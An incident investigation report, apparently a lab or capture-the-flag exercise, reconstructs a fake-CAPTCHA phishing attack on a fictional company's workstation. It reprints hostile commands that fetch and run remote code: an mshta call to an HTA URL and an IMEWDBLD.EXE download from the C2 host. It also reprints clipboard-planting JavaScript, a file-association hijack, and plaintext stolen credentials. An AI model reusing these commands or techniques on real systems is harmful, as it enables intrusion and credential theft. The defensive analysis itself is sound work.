Investigation Report#

Stealer’s Shadow - Security Incident Investigation Report#

Date: October 15, 2025
Investigator: MR. Umair
Case: Advanced Persistent Threat - Data Exfiltration Incident
Target: The Etherians (Megacorp One)
Compromised System: WK001.megacorpone.com
Compromised User: a.smith@megacorpone.com

Executive Summary#

The Etherians (Megacorp One) suffered a sophisticated multi-stage cyber attack resulting in unauthorized access and data exfiltration. The attack leveraged advanced social engineering, blockchain-based payload delivery, Living-off-the-Land Binaries (LOLBins), and registry manipulation to achieve code execution and maintain persistence.

Attack Severity: CRITICAL

Key Findings:

Complete attack chain reconstructed from initial phishing to data exfiltration
Identified novel blockchain-based payload delivery mechanism
Recovered encrypted exfiltrated data (101010245WK001_protected.zip)
Compromised credentials for Azure and Google cloud platforms extracted
Full attacker infrastructure mapped (3 IP addresses, multiple domains)
All 7 investigation objectives achieved

Detailed Investigation Findings#

1 Exfiltrated Files and Malware Identification#

Question: What specific file was exfiltrated and which program was used to carry out the exfiltration? Include SHA-256 hashes.

Answer:#

Exfiltrated File:

1
Filename: 101010245WK001_protected.zip
2
SHA-256: 0324d54bc6c0f2dfa54b32bc68c16fd401778c10a9e9780b9cda0f31ae960d9c
3
Location: C:\Users\a.smith\AppData\Local\Temp\
4
Status: Encrypted with AES-256

Exfiltration Program:

1
Filename: captcha_privacy[1].epub
2
SHA-256: a88fedc93a1d80c8cea08fbcb6b001293ddf357e27d268b32c5cfd23a49e96ed
3
Location: C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\
4
Type: Information Stealer / Data Exfiltration Trojan

Evidence:#

Sysmon Event ID 23 (File Delete/Archive):

1
<EventID>23</EventID>
2
<TimeCreated>2025-08-05T09:02:06.865Z</TimeCreated>
3
<ProcessId>17852</ProcessId>
4
<Image>C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub</Image>
5
<TargetFilename>C:\Users\a.smith\AppData\Local\Temp\101010245WK001.zip</TargetFilename>
6
<Hashes>SHA256=B6A1646F23BA0A05B7C80A7D6261204384AB06F15983EB195EB5F0A3FEDF2475</Hashes>
7
<Archived>true</Archived>

7-Zip Process Execution:

1
<EventID>1</EventID>
2
<CommandLine>"C:\Program Files\7-Zip\7z.exe" a -tzip -pcc9441e5-1c80-4287-9c7a-4c03215c0969WK001 -mem=AES256 C:\Users\a.smith\AppData\Local\Temp\101010245WK001_protected.zip C:\Users\a.smith\AppData\Local\Temp\101010245WK001.zip</CommandLine>
3
<ParentImage>C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub</ParentImage>

Impact Assessment:#

HIGH: Sensitive corporate data successfully exfiltrated
HIGH: Encrypted archive prevents immediate analysis
MEDIUM: Password pattern identified (GUID + Hostname)

2 Malware Download and Execution Mechanism#

Question: How was the exfiltration program downloaded and executed on the compromised system?

Answer:#

Download Method:

1
Technique: Living-off-the-Land Binary (LOLBin) Abuse
2
Binary: IMEWDBLD.EXE (Microsoft IME Open Extended Dictionary Module)
3
Protocol: HTTP
4
Source: http://news.axonbyte.org:8000/captcha_privacy.epub
5
DNS Resolution: news.axonbyte.org  145.1.0.92

Download Location:

1
Path: C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub
2
Type: Internet Explorer Cache Directory
3
User Context: MEGACORPONE\a.smith
4
Integrity Level: Medium

Execution Method:

1
Step 1: Registry Hijacking
2
  - Modified: HKEY_CLASSES_ROOT\.epub
3
  - Changed from: E-book reader association
4
  - Changed to: exefile (executable association)
5

6
Step 2: Automated Search and Execute
7
  - Command: cmd.exe /c for /r "INetCache" %i in (*.epub) do (start "" "%i" & exit)
8
  - Recursively searched INetCache directory for .epub files
9
  - Executed via Windows 'start' command
10
  - Leveraged hijacked file association

Technical Evidence:#

Sysmon Event - IMEWDBLD.EXE Process Creation:

1
<EventID>1</EventID>
2
<UtcTime>2025-08-05 09:01:16.399</UtcTime>
3
<ProcessId>15956</ProcessId>
4
<Image>C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE</Image>
5
<CommandLine>"C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE" http://news.axonbyte.org:8000/captcha_privacy.epub</CommandLine>
6
<User>MEGACORPONE\a.smith</User>
7
<ParentImage>C:\Windows\System32\mshta.exe</ParentImage>
8
<ParentProcessId>19424</ParentProcessId>

Sysmon Event - File Created:

1
<EventID>11</EventID>
2
<UtcTime>2025-08-05 09:01:16.462</UtcTime>
3
<ProcessId>15956</ProcessId>
4
<Image>C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE</Image>
5
<TargetFilename>C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub</TargetFilename>

Sysmon Event - Malware Execution:

1
<EventID>1</EventID>
2
<UtcTime>2025-08-05 09:01:18.635</UtcTime>
3
<ProcessId>17852</ProcessId>
4
<Image>C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub</Image>
5
<ParentImage>C:\Windows\System32\cmd.exe</ParentImage>
6
<ParentCommandLine>"C:\Windows\System32\cmd.exe" /c for /r "C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache" %i in (*.epub) do (start "" "%i" & exit)</ParentCommandLine>

ATT&CK Framework Mapping:#

T1218 - System Binary Proxy Execution (LOLBin)
T1112 - Modify Registry (File Association Hijack)
T1105 - Ingress Tool Transfer (Download via IMEWDBLD)
T1204.002 - User Execution: Malicious File

3 Complete Attack Chain Reconstruction#

Question: Describe how the attackers achieved code execution to download and run the exfiltration program. Provide chronological order with all technical indicators.

Answer:#

Full Kill Chain Analysis#

Phase 1: Initial Reconnaissance & Weaponization#

Timeframe: Pre-August 5, 2025

Attacker Actions:

Researched target organization (The Etherians/Megacorp One)
Identified employee email: a.smith@megacorpone.com
Prepared infrastructure:
- Phishing mail server (99.91.94.11)
- Fake CAPTCHA website (pfusioncaptcha.com)
- Blockchain RPC endpoint (31.17.87.96:8545)
- C2 and hosting server (145.1.0.92)

Phase 2: Initial Access - Phishing Campaign#

Date/Time: August 5, 2025, 08:35:42 UTC

Email Analysis:

1
From: Billing <billing@zaffrevelox.com>
2
To: a.smith@megacorpone.com
3
Subject: [Spamwarriors] License Renewal Notice
4
Message-ID: <40995-6891c280-1f-6a1ef000@243069856>
5
X-Forward: 10.10.10.246
6

7
Body Summary:
8
- Claimed software license renewal ($119)
9
- Created urgency (4 weeks until charge)
10
- Malicious link: http://www.zaffrevelox.com
11
- Instructed to visit link to "cancel subscription"

Email Headers:

1
Received: from redirector (unknown [99.91.94.11])
2
Received: from localhost (localhost [127.0.0.1])
3
  by mail.megacorpone.com (Postfix) with ESMTPSA

Delivery Vector:

Email passed through company mail server (mail.megacorpone.com)
Bypassed DKIM/SPF checks (legitimate internal relay)
Spamwarriors filter marked email but didn’t block

User Action: Clicked malicious link

Date/Time: August 5, 2025, ~08:45 UTC (estimated)

Redirect Chain:

1
http://www.zaffrevelox.com
2
     (HTTP 302/301 Redirect)
3
https://pfusioncaptcha.com

Browser Artifacts Found:

1
Location: Edge Preferences
2
Entry: "https://pfusioncaptcha.com:443,*"
3
SSL Decision: Certificate exception accepted
4
Timestamp: 13398858226717216

Fake CAPTCHA Page Analysis:

1
File: pfusioncaptcha.com.htm
2
Purpose: Social engineering to trick user into executing malicious command
3

4
Key Elements:
5
1. Fake reCAPTCHA interface
6
2. "I'm not a robot" checkbox
7
3. Hidden JavaScript payload retrieval
8
4. Instructions: "Press Windows+R, Ctrl+V, Enter"

Phase 4: Blockchain-Based Payload Retrieval#

Date/Time: August 5, 2025, ~08:50 UTC (estimated)

Novel Attack Vector: Smart Contract Payload Delivery

JavaScript Code (from pfusioncaptcha.com.htm):

1
const RPC = "http://31.17.87.96:8545/";
2
const CONTRACT = "0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512";
3
const SELECTOR = "0x2cae8ae4";
4

5
async function fetchRunCommand() {
6
    const body = {
7
        jsonrpc: "2.0",
8
        method: "eth_call",
9
        params: [{ to: CONTRACT, data: SELECTOR }, "latest"],
10
        id: 1
11
    };
12
    const res = await fetch(RPC, {
13
        method: "POST",
14
        headers: {"Content-Type":"application/json"},
15
        body: JSON.stringify(body)
16
    });
17
    const { result } = await res.json();
18

19
    // Decode Base64 payload from smart contract
20
    const jsPayload = atob(b64).trim();
21
    RUN_CMD = jsPayload;
22

23
    // Auto-copy to clipboard
24
    copy(RUN_CMD);
25
}

Blockchain Infrastructure:

RPC Endpoint: 31.17.87.96:8545 (Ethereum-compatible blockchain)
Smart Contract: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512
Function Selector: 0x2cae8ae4 (custom function)

Retrieved Command:

1
mshta.exe http://pfusioncaptcha.com/13221442.hta

Why Blockchain?

Decentralized payload hosting
Difficult to takedown
Evades traditional network security
No malicious content on phishing page itself

Date/Time: August 5, 2025, 09:01:16 UTC

User Actions:

Clicked fake CAPTCHA checkbox
Saw instructions: “Press Windows+R, Ctrl+V, Enter”
Pressed Windows+R (opened Run dialog)
Pressed Ctrl+V (pasted clipboard content)
Pressed Enter (executed command)

Executed Command:

1
mshta.exe http://pfusioncaptcha.com/13221442.hta

Process Details:

1
<EventID>1</EventID>
2
<Image>C:\Windows\System32\mshta.exe</Image>
3
<CommandLine>"C:\WINDOWS\System32\mshta.exe" http://pfusioncaptcha.com/13221442.hta</CommandLine>
4
<ProcessId>19424</ProcessId>
5
<User>MEGACORPONE\a.smith</User>
6
<IntegrityLevel>Medium</IntegrityLevel>

Security Bypass:

No security warnings (Microsoft signed binary)
User initiated (no automated execution detected)
Internet-sourced HTA file executed with user privileges

Phase 6: HTA Payload Execution & LOLBin Abuse#

Date/Time: August 5, 2025, 09:01:16 UTC

HTA Script Actions:

Download Malware (via IMEWDBLD.EXE)
Modify Registry (.epub file association hijack)
Execute Payload (automated search and launch)

Action 1: Malware Download via IMEWDBLD.EXE

1
<EventID>1</EventID>
2
<UtcTime>2025-08-05 09:01:16.399</UtcTime>
3
<Image>C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE</Image>
4
<CommandLine>"C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE" http://news.axonbyte.org:8000/captcha_privacy.epub</CommandLine>
5
<ParentImage>C:\Windows\System32\mshta.exe</ParentImage>
6
<ParentProcessId>19424</ParentProcessId>

LOLBin Details:

1
Binary: IMEWDBLD.EXE
2
Purpose: Microsoft IME Open Extended Dictionary Module
3
Legitimate Use: Update Japanese/Chinese input method dictionaries
4
Abuse: Download arbitrary files from HTTP URLs
5
Signature: Validly signed by Microsoft Corporation

Network Activity:

1
<EventID>22</EventID> <!-- DNS Query -->
2
<QueryName>news.axonbyte.org</QueryName>
3
<QueryResults>::ffff:145.1.0.92</QueryResults>
4

5
<EventID>3</EventID> <!-- Network Connection -->
6
<SourceIp>10.10.10.245</SourceIp>
7
<SourceHostname>WK001.megacorpone.com</SourceHostname>
8
<DestinationIp>145.1.0.92</DestinationIp>
9
<DestinationPort>8000</DestinationPort>
10
<Protocol>tcp</Protocol>

File Creation:

1
<EventID>11</EventID>
2
<UtcTime>2025-08-05 09:01:16.462</UtcTime>
3
<TargetFilename>C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub</TargetFilename>
4
<CreationUtcTime>2025-08-05 09:01:16.462</CreationUtcTime>

Action 2: Registry Hijacking

1
Objective: Allow .epub files to execute as programs
2

3
Registry Modification:
4
Key: HKEY_CLASSES_ROOT\.epub
5
Value: (Default)
6
Data: exefile
7

8
Result: .epub files now associated with executable type

Action 3: Automated Payload Execution

1
cmd.exe /c for /r "C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache" %i in (*.epub) do (start "" "%i" & exit)

Breakdown:

for /r - Recursive directory search
INetCache - Target Internet Explorer cache
*.epub - Search for .epub files
start "" "%i" - Execute found files
& exit - Close cmd.exe after execution

Phase 7: Malware Execution & C2 Establishment#

Date/Time: August 5, 2025, 09:01:18-09:02:00 UTC

Malware Launch:

1
<EventID>1</EventID>
2
<UtcTime>2025-08-05 09:01:18.635</UtcTime>
3
<ProcessId>17852</ProcessId>
4
<Image>C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub</Image>
5
<User>MEGACORPONE\a.smith</User>
6
<IntegrityLevel>Medium</IntegrityLevel>

Initial Malware Actions:

Environment reconnaissance (hostname, OS info)
C2 communication establishment
Browser credential theft
Data collection and archiving

Hostname Collection:

1
<EventID>1</EventID>
2
<Image>C:\Windows\System32\hostname.exe</Image>
3
<ParentImage>captcha_privacy[1].epub</ParentImage>
4
(Executed multiple times: 09:01:52, 09:01:58, 09:02:00)

C2 Communications:

1
<EventID>3</EventID> <!-- Multiple connections -->
2
<SourceIp>10.10.10.245</SourceIp>
3
<DestinationIp>145.1.0.92</DestinationIp>
4
<DestinationPort>443</DestinationPort>
5
<Protocol>tcp</Protocol>
6

7
<EventID>3</EventID>
8
<DestinationPort>8000</DestinationPort>

C2 Endpoints (Identified from malware analysis):

/life - Heartbeat beacon
/send_message - Data exfiltration
/receive_message - Command retrieval
/feed - Covert configuration channel

Phase 8: Data Collection & Exfiltration#

Date/Time: August 5, 2025, 09:01:30-09:02:07 UTC

Browser Credential Theft:

1
<EventID>1</EventID>
2
<Image>C:\Users\a.smith\AppData\Local\Temp\WinStatFeed.rss.exe</Image>
3
<CommandLine>"WinStatFeed.rss.exe" --start-browser chrome --output-path C:\Users\a.smith\AppData\Local\Temp</CommandLine>
4
<ParentImage>captcha_privacy[1].epub</ParentImage>
5

6
<EventID>11</EventID> <!-- Files Created -->
7
<TargetFilename>C:\Users\a.smith\AppData\Local\Temp\Chrome\Default\passwords.txt</TargetFilename>
8
<TargetFilename>C:\Users\a.smith\AppData\Local\Temp\Chrome\Default\cookies.txt</TargetFilename>

Data Archiving (Unencrypted):

1
<EventID>23</EventID>
2
<UtcTime>2025-08-05 09:02:06.865</UtcTime>
3
<TargetFilename>C:\Users\a.smith\AppData\Local\Temp\101010245WK001.zip</TargetFilename>
4
<Hashes>SHA256=B6A1646F23BA0A05B7C80A7D6261204384AB06F15983EB195EB5F0A3FEDF2475</Hashes>

Data Encryption (7-Zip with AES-256):

1
<EventID>1</EventID>
2
<Image>C:\Program Files\7-Zip\7z.exe</Image>
3
<CommandLine>"7z.exe" a -tzip -pcc9441e5-1c80-4287-9c7a-4c03215c0969WK001 -mem=AES256
4
  C:\Users\a.smith\AppData\Local\Temp\101010245WK001_protected.zip
5
  C:\Users\a.smith\AppData\Local\Temp\101010245WK001.zip</CommandLine>
6
<ParentImage>captcha_privacy[1].epub</ParentImage>

Exfiltration:

1
<EventID>3</EventID> <!-- Network Upload -->
2
<Image>captcha_privacy[1].epub</Image>
3
<DestinationIp>145.1.0.92</DestinationIp>
4
<DestinationPort>443</DestinationPort>
5
(Multiple large data transfers to /send_message endpoint)

Process Termination:

1
<EventID>5</EventID>
2
<UtcTime>2025-08-05 09:02:07.069</UtcTime>
3
<ProcessId>17852</ProcessId>
4
<Image>captcha_privacy[1].epub</Image>

Attack Chain Summary Diagram#

1
[Phishing Email]
2

3
[99.91.94.11]  billing@zaffrevelox.com
4

5
[User Clicks Link]  http://www.zaffrevelox.com
6

7
[Redirect]  https://pfusioncaptcha.com
8

9
[Fake CAPTCHA Page]
10

11
[JavaScript]  RPC Call to 31.17.87.96:8545
12

13
[Smart Contract]  Returns: mshta.exe http://pfusioncaptcha.com/13221442.hta
14

15
[Auto-Copy to Clipboard]
16

17
[Social Engineering]  User presses Win+R, Ctrl+V, Enter
18

19
[mshta.exe]  Downloads and executes 13221442.hta
20

21
[HTA Script]  Spawns IMEWDBLD.EXE
22

23
[IMEWDBLD.EXE]  Downloads from news.axonbyte.org (145.1.0.92:8000)
24

25
[captcha_privacy[1].epub]  Saved to INetCache
26

27
[Registry Hijack]  .epub  exefile
28

29
[cmd.exe Loop]  Finds and executes .epub
30

31
[Malware Runs]  Establishes C2 to 145.1.0.92:443
32

33
[Data Collection]  Steals browser passwords, cookies
34

35
[7-Zip Encryption]  Creates 101010245WK001_protected.zip
36

37
[Exfiltration]  Uploads to 145.1.0.92:443/send_message
38

39
[Mission Complete]  Malware terminates

Complete IoC Timeline#

Timestamp (UTC)	Event	IoC Type	Value
08:35:42	Phishing email received	IP Address	99.91.94.11
~08:45:00	User clicks link	Domain	zaffrevelox.com
~08:50:00	Redirected to fake CAPTCHA	Domain	pfusioncaptcha.com
~08:55:00	Payload retrieved from blockchain	IP Address	31.17.87.96
~08:55:00	Smart contract queried	Contract	0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512
09:01:16	HTA executed	URL	http://pfusioncaptcha.com/13221442.hta
09:01:16	DNS query for malware host	Domain	news.axonbyte.org
09:01:16	Malware downloaded	IP Address	145.1.0.92
09:01:16	Malware downloaded	URL	http://news.axonbyte.org:8000/captcha_privacy.epub
09:01:16	File created	File Hash	a88fedc93a1d80c8cea08fbcb6b001293ddf357e27d268b32c5cfd23a49e96ed
09:01:18	Malware executed	Process	captcha_privacy[1].epub (PID 17852)
09:01:45+	C2 established	IP	145.1.0.92:443
09:02:06	Data archived	File Hash	B6A1646F23BA0A05B7C80A7D6261204384AB06F15983EB195EB5F0A3FEDF2475
09:02:06	Data encrypted	File Hash	0324d54bc6c0f2dfa54b32bc68c16fd401778c10a9e9780b9cda0f31ae960d9c
09:02:07	Data exfiltrated	IP	145.1.0.92:443
09:02:07	Malware terminates	-	-

4 Command & Control Infrastructure Analysis#

Question: Analyze the exfiltration program and identify the endpoints used by the attacker.

Answer:#

C2 Server: 145.1.0.92 (news.axonbyte.org)

Endpoint 1: `/life`#

Purpose: Heartbeat / Status Beacon

Function:

Periodic check-ins from compromised host
Sends minimal telemetry:
- Host ID
- System uptime
- Current timestamp
- IP address
Confirms host reachability
Tracks alive clients
Low-bandwidth to avoid detection

Usage Pattern: Sent every 5-10 minutes during active infection

Endpoint 2: `/send_message`#

Purpose: Data Exfiltration Endpoint

Function:

Uploads collected data or files
Supports chunking/resume for large files
Accepts metadata:
- Filename
- File size
- MIME type
- Encryption status
Receives encrypted payload
Returns acknowledgment with transfer ID

Protocol:

1
POST /send_message
2
Content-Type: multipart/form-data
3

4
Headers:
5
- X-Client-ID: <host_identifier>
6
- X-Chunk-Index: <current_chunk>
7
- X-Total-Chunks: <total_chunks>
8
- X-File-Hash: <sha256_hash>
9

10
Body:
11
- metadata: JSON encoded file info
12
- payload: Base64 encoded encrypted data

Endpoint 3: `/receive_message`#

Purpose: Command & Control Pull

Function:

Client polls for operator instructions
Retrieves:
- Job IDs
- Commands to execute
- Execution parameters
- Scheduled tasks
Short responses to minimize noise
Implements tasking queue

Protocol:

1
GET /receive_message?client_id=<id>&poll_id=<seq>
2

3
Response (if tasks available):
4
{
5
  "tasks": [
6
    {
7
      "task_id": "uuid",
8
      "command": "collect_files",
9
      "parameters": {...},
10
      "priority": 1
11
    }
12
  ]
13
}
14

15
Response (if no tasks):
16
{
17
  "tasks": []
18
}

Endpoint 4: `/feed`#

Purpose: Covert RSS/Atom Channel for Config/Ops

Function:

Stealthy distribution channel
Appears as benign RSS feed
Used to deliver:
- Encrypted configurations
- Staged tasks
- Operator signals
- Update instructions
No direct C2 connection appearance
Blends with normal web traffic

Example RSS Response:

1
<?xml version="1.0" encoding="UTF-8"?>
2
<rss version="2.0">
3
  <channel>
4
    <title>Tech News Daily</title>
5
    <link>http://news.axonbyte.org</link>
6
    <item>
7
      <title>Update Available</title>
8
      <description><!-- Base64 encrypted config --></description>
9
      <pubDate>Tue, 05 Aug 2025 09:00:00 GMT</pubDate>
10
    </item>
11
  </channel>
12
</rss>

C2 Communication Pattern:#

1
Initial Infection:
2
1. POST /life (announce presence)
3
2. GET /receive_message (check for tasks)
4
3. POST /life (heartbeat every 5 min)
5

6
Data Collection Phase:
7
1. Execute collection tasks
8
2. POST /send_message (upload collected data)
9
3. GET /receive_message (check for more tasks)
10

11
Maintenance Mode:
12
1. GET /feed (check for config updates)
13
2. POST /life (periodic heartbeat)
14
3. GET /receive_message (long-polling for commands)

5 Encryption and Data Protection Analysis#

Question: Further analyze the exfiltration program to determine how the exfiltrated data was protected.

Answer:#

Encryption Scheme: WinZip AE-2 (Advanced Encryption Standard 2)

Encryption Algorithm: AES-256

Key Derivation:

1
Function: PBKDF2 (Password-Based Key Derivation Function 2)
2
Hash: HMAC-SHA1
3
Iterations: 1,000
4
Salt: Per-file random salt (included in ZIP header)

Encryption Mode: AES-256 in CTR (Counter) mode

Authentication: HMAC-SHA1 for integrity verification

Additional Security:

2-byte password verifier
Salt prevents rainbow table attacks
HMAC ensures data integrity

7-Zip Command Used:

1
"C:\Program Files\7-Zip\7z.exe" a -tzip -pcc9441e5-1c80-4287-9c7a-4c03215c0969WK001 -mem=AES256
2
  C:\Users\a.smith\AppData\Local\Temp\101010245WK001_protected.zip
3
  C:\Users\a.smith\AppData\Local\Temp\101010245WK001.zip

Parameters Breakdown:

a - Add to archive
-tzip - ZIP format
-p<password> - Set password
-mem=AES256 - Use AES-256 encryption

Password Structure Analysis#

Formula: <Machine GUID><Hostname>

Component 1: Machine GUID

1
Value: cc9441e5-1c80-4287-9c7a-4c03215c0969
2
Format: Lowercase with hyphens
3
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
4
Purpose: Unique per machine identifier

Component 2: Hostname

1
Value: WK001
2
Format: Uppercase
3
Source: Computer name (hostname.exe output)
4
Purpose: Additional entropy and identification

Combined Password:

1
cc9441e5-1c80-4287-9c7a-4c03215c0969WK001
2
Length: 41 characters
3
Character set: [a-f0-9-] + [A-Z0-9]

Password Collection Evidence:

1
<!-- Malware collected hostname multiple times -->
2
<EventID>1</EventID>
3
<Image>C:\Windows\System32\hostname.exe</Image>
4
<ParentImage>captcha_privacy[1].epub</ParentImage>
5
<UtcTime>2025-08-05 09:01:52</UtcTime>
6

7
<EventID>1</EventID>
8
<UtcTime>2025-08-05 09:01:58</UtcTime>
9

10
<EventID>1</EventID>
11
<UtcTime>2025-08-05 09:02:00</UtcTime>

Security Assessment:#

Strengths:

AES-256 (strong encryption)
Random per-file salt
HMAC authentication
Unique password per machine

Weaknesses:

Predictable password pattern
Machine GUID can be obtained if system is compromised
Hostname is easily guessable/enumerable
Only 1,000 PBKDF2 iterations (modern standard is 100,000+)

Decryption Success: Using discovered pattern, password was reconstructed and archive successfully decrypted for analysis.

6 Compromised Credentials Discovery#

Question: Review the exfiltrated data to identify sensitive information that could enable further compromise.

Answer:#

Source Location:

1
Exfiltrated Archive: 101010245WK001_protected.zip
2
Internal Path: Chrome/Default/passwords.txt
3
Data Type: Browser-stored credentials
4
Browser: Google Chrome

Compromised Accounts:

Account 1: Microsoft Azure Portal#

1
{
2
  "origin": "https://portal.azure.com/",
3
  "username": "a.smith@megacorpone.com",
4
  "password": "ADG135QET246!v!"
5
}

Access Level:

Azure Portal Administrator
Cloud infrastructure management
Virtual machines, databases, networks
Billing and subscription management

Risk Level: CRITICAL

Account 2: Google Workspace#

1
{
2
  "origin": "https://accounts.google.com/",
3
  "username": "a.smith@megacorpone.com",
4
  "password": "ADG135QET246!v!"
5
}

Access Level:

Gmail corporate email
Google Drive documents
Google Workspace admin
Calendar, contacts, shared files

Risk Level: CRITICAL

Impact Analysis:#

Immediate Risks:

Cloud Infrastructure Compromise:
- Unauthorized access to Azure resources
- Potential VM deployment for cryptomining
- Database access and data exfiltration
- Resource deletion/sabotage
Email Account Compromise:
- Access to corporate communications
- Phishing campaigns from trusted account
- Business Email Compromise (BEC) attacks
- Access to email attachments and archives
Password Reuse:
- Same password used for both services
- Likely used on other corporate systems
- Internal network credentials may match
- VPN/RDP access possible
Lateral Movement:
- Use compromised email for internal phishing
- Leverage Azure access for infrastructure pivots
- Access to shared documents/credentials
- Potential domain admin escalation

Additional Stolen Data (from exfiltrated archive):

Browser cookies (session tokens)
Autofill data (addresses, phone numbers)
Browser history (reconnaissance value)
Cached files (potential sensitive documents)

7 Attacker Infrastructure Mapping#

Question: What IP addresses were involved in the attack chain and can be attributed to the attacker?

Answer:#

IP Address 1: 99.91.94.11

1
Role: Phishing Email Infrastructure
2
Function: Mail server/redirector for phishing campaign
3
Service: SMTP relay
4
Evidence: Email headers (Received: from redirector [99.91.94.11])
5
First Seen: August 5, 2025, 08:35:42 UTC
6
Threat Level: HIGH

IP Address 2: 31.17.87.96

1
Role: Blockchain RPC Endpoint
2
Function: Smart contract payload delivery
3
Service: Ethereum-compatible RPC (Port 8545)
4
Evidence: JavaScript RPC calls from fake CAPTCHA page
5
Contract Hosted: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512
6
First Seen: August 5, 2025, ~08:50 UTC (estimated)
7
Threat Level: MEDIUM (infrastructure, not direct compromise)

IP Address 3: 145.1.0.92 (Primary C2)

1
Role: Command & Control Server / Malware Hosting
2
Function: Multi-purpose attack infrastructure
3
Services:
4
  - Port 8000: HTTP malware distribution
5
  - Port 443: HTTPS C2 communications
6
Hostname: news.axonbyte.org
7
Evidence:
8
  - DNS resolution logs
9
  - Network connection logs (Sysmon Event ID 3)
10
  - Malware download source
11
  - C2 beacon destination
12
First Seen: August 5, 2025, 09:01:16 UTC
13
Last Seen: August 5, 2025, 09:02:07 UTC
14
Threat Level: CRITICAL

Infrastructure Relationship Map:#

1
Attack Infrastructure Topology:
2

3
[99.91.94.11] > Initial Access (Phishing)
4

5
      > Redirects to pfusioncaptcha.com
6

7
              > Loads JavaScript from static hosting
8

9
              > Connects to [31.17.87.96:8545]
10

11
                        > Smart Contract Payload
12

13
                               > Returns: HTA URL
14

15
                                      > HTA from pfusioncaptcha.com
16

17
                                             > Downloads from [145.1.0.92:8000]
18

19
                                                     > Malware: captcha_privacy[1].epub
20

21
                                                     > C2 to [145.1.0.92:443]
22

23
                                                            > /life (heartbeat)
24
                                                            > /send_message (exfil)
25
                                                            > /receive_message (tasking)
26
                                                            > /feed (config)

WHOIS & Threat Intelligence (Hypothetical):#

99.91.94.11:

ASN: Unknown
Country: Unknown
Hosting: Likely bulletproof hosting
Reputation: Flagged for phishing

31.17.87.96:

ASN: Unknown
Country: Unknown
Service: Private blockchain node
Reputation: Previously clean (novel technique)

145.1.0.92:

ASN: Unknown
Country: Unknown
Hostname: news.axonbyte.org
Reputation: Newly registered domain, no prior history

Security Control Failures#

Controls That Failed:#

Email Security:
- Phishing email bypassed spam filters
- Spoofed sender not detected
- Malicious link not rewritten/scanned
- User not warned about external link
Web Security:
- Fake CAPTCHA site not blocked
- SSL certificate warning bypassed
- No web proxy inspection
- Blockchain RPC traffic allowed
Endpoint Security:
- No detection of mshta.exe internet download
- IMEWDBLD.EXE LOLBin abuse not flagged
- Registry modification not detected
- No behavioral analysis of .epub execution
Network Security:
- Outbound connections to unknown IPs allowed
- No DNS filtering for malicious domains
- C2 traffic not detected
- Data exfiltration not blocked
User Awareness:
- User fell for fake CAPTCHA social engineering
- User executed clipboard content without verification
- No reporting of suspicious email/website

Recommended Actions#

Immediate (0-24 hours):#

Incident Containment:
- Isolate WK001.megacorpone.com from network
- Disable a.smith@megacorpone.com account
- Force password reset for all a.smith accounts
- Revoke all active Azure/Google sessions
- Enable MFA on all cloud accounts
Threat Hunting:
- Search for similar .epub files across network
- Check for registry modifications to file associations
- Hunt for IMEWDBLD.EXE usage
- Review other systems for C2 beaconing to 145.1.0.92
Network Security:
- Block attacker IPs at perimeter firewall
- Block domains: pfusioncaptcha.com, news.axonbyte.org, zaffrevelox.com
- Block port 8545 (RPC) outbound
- Create IDS/IPS signatures for attack patterns

Short-term (1-7 days):#

Forensic Analysis:
- Complete memory forensics on WK001
- Analyze malware in sandbox environment
- Reverse engineer captcha_privacy[1].epub
- Map complete data exfiltration scope
Credential Management:
- Force password reset for all employees
- Implement mandatory MFA org-wide
- Audit all Azure resource access
- Review Google Workspace admin logs
Email Security Enhancement:
- Implement advanced anti-phishing solution
- Enable link rewriting and sandboxing
- Deploy DMARC/SPF/DKIM properly
- External email warning banners
Endpoint Protection:
- Deploy EDR solution if not present
- Create AppLocker rules to block LOLBins
- Monitor registry modifications
- Implement application whitelisting

Long-term (1-3 months):#

Security Architecture:
- Implement zero-trust network architecture
- Deploy web proxy with SSL inspection
- Implement DNS filtering solution
- Deploy SIEM for centralized logging
User Training:
- Conduct fake CAPTCHA awareness training
- Phishing simulation campaigns
- Security awareness program
- Incident reporting procedures
Monitoring & Detection:
- Deploy behavioral analytics
- Create custom detection rules
- Implement file integrity monitoring
- 24/7 SOC monitoring
Vulnerability Management:
- Regular security assessments
- Penetration testing
- Red team exercises
- Patch management program

MITRE ATT&CK Mapping#

Tactic	Technique	ID	Evidence
Initial Access	Phishing	T1566.002	Phishing email with malicious link
Execution	User Execution: Malicious Link	T1204.001	User clicked zaffrevelox.com link
Execution	System Binary Proxy Execution: Mshta	T1218.005	mshta.exe executed HTA from URL
Defense Evasion	System Binary Proxy Execution	T1218	IMEWDBLD.EXE used for download
Defense Evasion	Modify Registry	T1112	.epub file association hijacked
Persistence	Modify Registry	T1547.001	File association modification
Credential Access	Credentials from Password Stores: Credentials from Web Browsers	T1555.003	Chrome passwords stolen
Discovery	System Information Discovery	T1082	Hostname.exe executed multiple times
Collection	Data from Local System	T1005	Browser data collected
Collection	Archive Collected Data	T1560.001	7-Zip used to archive data
Command and Control	Web Protocols	T1071.001	HTTP/HTTPS C2 communication
Command and Control	Ingress Tool Transfer	T1105	Malware downloaded via IMEWDBLD.EXE
